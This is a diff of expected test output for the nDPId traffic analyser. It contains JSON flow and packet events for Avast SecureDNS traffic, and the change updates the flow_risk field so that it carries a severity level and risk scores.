+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241699450,"flow_last_seen":1625241699450,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625241699572,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625241699572,"pkt":"YDjgxTWgeJS0JASgCABFAADMLtkAADARvtC11iOVwKgCZAG77xEAuEqr03OBgAABAAEAAAAAATIJU0VjdVJlRE5zBUF2YXNUA0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241701462,"flow_last_seen":1625241701462,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625241701462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1625241701462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625241701462,"pkt":"eJS0JASgYDjgxTWgCABFAABDEeoAAH8RjUjAqAJktdYjle2jAbsAL7p1TIkBAAABAAAAAAAAATIJU0VDVXJFZE5zBWF2QVN0A0NPTQAAEAAB"}
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241701462,"flow_last_seen":1625241701462,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625241701462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241701462,"flow_last_seen":1625241701462,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625241701462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1625241701583,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625241701583,"pkt":"YDjgxTWgeJS0JASgCABFAADMMogAADIRuSG11iOVwKgCZAG77aMAuDLkTImBgAABAAEAAAAAATIJU0VDVXJFZE5zBWF2QVN0A0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241714666,"flow_last_seen":1625241714666,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625241714666,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1625241714666,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625241714666,"pkt":"eJS0JASgYDjgxTWgCABFAABDXeQAAH8RQU7AqAJktdYjlfU3AbsAL3hGRwQBAAABAAAAAAAAATIJU2VjVVJlZG5zBUFWYVN0A0NPbQAAEAAB"}
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241714666,"flow_last_seen":1625241714666,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625241714666,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241714666,"flow_last_seen":1625241714666,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625241714666,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1625241714787,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625241714787,"pkt":"YDjgxTWgeJS0JASgCABFAADMRgkAADERpqC11iOVwKgCZAG79TcAuPC0RwSBgAABAAEAAAAAATIJU2VjVVJlZG5zBUFWYVN0A0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241699450,"flow_last_seen":1625241699572,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241714666,"flow_last_seen":1625241714787,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241701462,"flow_last_seen":1625241701583,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241699450,"flow_last_seen":1625241699572,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241714666,"flow_last_seen":1625241714787,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241701462,"flow_last_seen":1625241701583,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320207133,"flow_last_seen":1625320207133,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1625320207133,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625320207133,"pkt":"eJS0JASgYDjgxTWgCABFAABDS9IAAH8RU2DAqAJktdYjld0FAbsALycJUJMBAAABAAAAAAAAATIJc2VjVVJlZG5TBUF2YXNUA2NvTQAAEAAB"}
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320207133,"flow_last_seen":1625320207133,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320207133,"flow_last_seen":1625320207133,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1625320207252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625320207252,"pkt":"YDjgxTWgeJS0JASgCABFAADMnAoAADMRTp+11iOVwKgCZAG73QUAuJ93UJOBgAABAAEAAAAAATIJc2VjVVJlZG5TBUF2YXNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320209063,"flow_last_seen":1625320209063,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625320209063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1625320209063,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625320209063,"pkt":"eJS0JASgYDjgxTWgCABFAABDS9YAAH8RU1zAqAJktdYjld29AbsAL+vXy0wBAAABAAAAAAAAATIJU2VjdVJFRG5TBWFWYVNUA0NvTQAAEAAB"}
-00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320209063,"flow_last_seen":1625320209063,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625320209063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320209063,"flow_last_seen":1625320209063,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625320209063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1625320209184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625320209184,"pkt":"YDjgxTWgeJS0JASgCABFAADMnWsAADMRTT611iOVwKgCZAG73b0AuGRGy0yBgAABAAEAAAAAATIJU2VjdVJFRG5TBWFWYVNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320207133,"flow_last_seen":1625320207252,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320209063,"flow_last_seen":1625320209184,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320207133,"flow_last_seen":1625320207252,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320209063,"flow_last_seen":1625320209184,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321673727,"flow_last_seen":1625321673727,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1625321673727,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625321673727,"pkt":"eJS0JASgYDjgxTWgCABFAABDS9wAAH8RU1bAqAJktdYjlcWVAbsAL1g+dw4BAAABAAAAAAAAATIJc2VDdXJFRE5TBUFWQXN0A0NvTQAAEAAB"}
-00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321673727,"flow_last_seen":1625321673727,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321673727,"flow_last_seen":1625321673727,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1625321673848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625321673848,"pkt":"YDjgxTWgeJS0JASgCABFAADMus8AADIRMNq11iOVwKgCZAG7xZUAuNCsdw6BgAABAAEAAAAAATIJc2VDdXJFRE5TBUFWQXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321675283,"flow_last_seen":1625321675283,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625321675283,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1625321675283,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625321675283,"pkt":"eJS0JASgYDjgxTWgCABFAABDS98AAH8RU1PAqAJktdYjle6zAbsAL9OvEl8BAAABAAAAAAAAATIJU0VDdVJFZE5zBWFWYXNUA0NPTQAAEAAB"}
